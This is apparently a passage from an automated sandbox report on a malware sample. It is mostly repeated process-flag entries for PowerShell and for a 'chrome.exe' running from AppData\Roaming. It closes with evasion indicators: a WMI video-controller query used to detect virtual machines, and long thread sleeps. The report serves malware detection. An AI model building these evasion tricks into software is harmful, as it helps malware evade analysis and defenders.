Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972Thread sleep count: 68 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972Thread sleep time: -68000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep count: 5547 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep count: 3401 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780Thread sleep count: 5587 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep count: 2582 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2296Thread sleep count: 989 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724Thread sleep count: 137 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248Thread sleep count: 2928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep count: 272 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 480Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828Thread sleep time: -77000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912Thread sleep count: 3963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1368Thread sleep count: 581 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1344Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 1048 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 151 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep count: 63 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
